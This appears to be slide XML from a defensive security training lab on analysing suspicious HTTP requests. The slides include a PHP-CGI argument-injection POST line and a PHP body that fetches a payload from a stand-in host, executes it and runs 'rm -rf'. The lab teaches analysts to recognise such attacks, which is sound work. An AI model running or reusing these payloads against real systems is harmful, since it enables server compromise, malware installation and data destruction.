          <p:cNvPr id="84994" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{721313C0-2368-D544-90BD-D057F360AEEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="449263" y="1206500"/>
            <a:ext cx="8256587" cy="430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215900" indent="-2159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14000"/>
              </a:lnSpc>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>You received several pieces of information during your work week. [see handouts: "Backing Information”]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buFont typeface="StarSymbol" charset="0"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Logs from web servers that were identified as suspicious but there was no matching attack signature.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buFont typeface="StarSymbol" charset="0"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Alert from your firewall on a possible </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buFont typeface="StarSymbol" charset="0"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> List of open DNS resolvers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buFont typeface="StarSymbol" charset="0"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> US-CERT vulnerability bulletin.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buFont typeface="StarSymbol" charset="0"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Blog post describing a new vulnerability in a CMS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Do you have any actionable information? If so, what action will you take? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Are any of the data streams possibly related? If so, in what way do you think this information might be analyzed together?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What additional data sources might be useful in your investigation? How could you get access to them?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:fade thruBlk="1"/>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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD7972EC-AA00-2D4B-9898-D304E64804AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="350838"/>
            <a:ext cx="8228013"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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Module 5 Lab: Suspicious HTTP requests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87042" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D233519B-31AB-E743-AE1A-E5902930244D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="449263" y="1206500"/>
            <a:ext cx="8256587" cy="430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215900" indent="-2159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14000"/>
              </a:lnSpc>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>You proceed to decode the HTTP header for the POST request, getting the output displayed below. What is going on here?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="50179" name="Group 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A68F6AB8-ABDC-3647-82AE-E4817B313F16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="806450" y="2060575"/>
          <a:ext cx="7302500" cy="1189038"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="7302500">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="510083020"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1189038">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle>
                      <a:lvl1pPr>
                        <a:spcBef>
                          <a:spcPts val="1425"/>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Lst>
                        <a:defRPr sz="2800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl1pPr>
                      <a:lvl2pPr>
                        <a:spcBef>
                          <a:spcPts val="1138"/>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Lst>
                        <a:defRPr sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl2pPr>
                      <a:lvl3pPr>
                        <a:spcBef>
                          <a:spcPts val="850"/>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Lst>
                        <a:defRPr sz="2000">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl3pPr>
                      <a:lvl4pPr>
                        <a:spcBef>
                          <a:spcPts val="575"/>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Lst>
                        <a:defRPr>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl4pPr>
                      <a:lvl5pPr>
                        <a:spcBef>
                          <a:spcPts val="288"/>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Lst>
                        <a:defRPr>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl5pPr>
                      <a:lvl6pPr marL="25146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Lst>
                        <a:defRPr>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl6pPr>
                      <a:lvl7pPr marL="29718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Lst>
                        <a:defRPr>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl7pPr>
                      <a:lvl8pPr marL="34290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Lst>
                        <a:defRPr>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl8pPr>
                      <a:lvl9pPr marL="38862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Lst>
                        <a:defRPr>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback"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Lst>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>POST /embed-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
                        <a:lnSpc>
                          <a:spcPct val="112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Lst>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Merriweather Sans" charset="0"/>
                          <a:ea typeface="Merriweather Sans" charset="0"/>
                          <a:cs typeface="Merriweather Sans" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68400" marR="68400" marT="56388" horzOverflow="overflow">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1224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lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:solidFill>
                      <a:srgbClr val="00AE1D"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2259324617"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="50185" name="Group 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B056462-96AE-B74B-A1BC-1C136F5B9288}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="984250" y="4508500"/>
          <a:ext cx="7065963" cy="1509713"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="7065963">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2087592893"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1509713">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle>
                      <a:lvl1pPr>
                        <a:spcBef>
                          <a:spcPts val="1425"/>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Lst>
                        <a:defRPr sz="2800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl1pPr>
                      <a:lvl2pPr>
                        <a:spcBef>
                          <a:spcPts val="1138"/>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Lst>
                        <a:defRPr sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl2pPr>
                      <a:lvl3pPr>
                        <a:spcBef>
                          <a:spcPts val="850"/>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Lst>
                        <a:defRPr sz="2000">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl3pPr>
                      <a:lvl4pPr>
                        <a:spcBef>
                          <a:spcPts val="575"/>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Lst>
                        <a:defRPr>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl4pPr>
                      <a:lvl5pPr>
                        <a:spcBef>
                          <a:spcPts val="288"/>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Lst>
                        <a:defRPr>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl5pPr>
                      <a:lvl6pPr marL="25146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Lst>
                        <a:defRPr>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl6pPr>
                      <a:lvl7pPr marL="29718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Lst>
                        <a:defRPr>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl7pPr>
                      <a:lvl8pPr marL="34290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Lst>
                        <a:defRPr>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl8pPr>
                      <a:lvl9pPr marL="3886200" indent="-228600" defTabSz="457200" fontAlgn="base" hangingPunct="0">
                        <a:lnSpc>
                          <a:spcPct val="93000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="288"/>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Lst>
                        <a:defRPr>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl9pPr>
                    </a:lstStyle>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
                        <a:lnSpc>
                          <a:spcPct val="94000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPct val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPct val="100000"/>
                        <a:buFont typeface="Times New Roman" panose="02020603050405020304"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Lst>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>&lt;? system("cd /tmp ; wget example.evil/payload.jpg ; curl -O http://example.evil/payload.jpg ; fetch http://example.evil/payload.jpg ; tar -xzvf payload.jpg ; chmod +x payload ; ./payload ; rm -rf *;wget example.evil/bot.jpg;tar -xzvf bot.jpg;rm -rf bot.jpg;cd .d;rm -rf m.set autorun;wget example.evil/m.set;wget example.evil/autorun.rar;mv autorun.rar autorun;chmod +x autorun;./autorun "); ?&gt;</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68400" marR="68400" marT="56414" marB="45741" horzOverflow="overflow">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1224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lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:solidFill>
                      <a:srgbClr val="00AE1D"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2629501421"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87055" name="Text Box 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27324075-5DD8-E741-ABFE-E046229E80E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="754063" y="3305175"/>
            <a:ext cx="7380287" cy="11509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9572" rIns="90000" bIns="45000"/>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98000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The advisory explains the “attacks deliver </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>unobfuscated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> PHP shellcode directly in the body of the HTTP request.” You obtain the HTTP body, getting the output displayed below. What is going on here?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
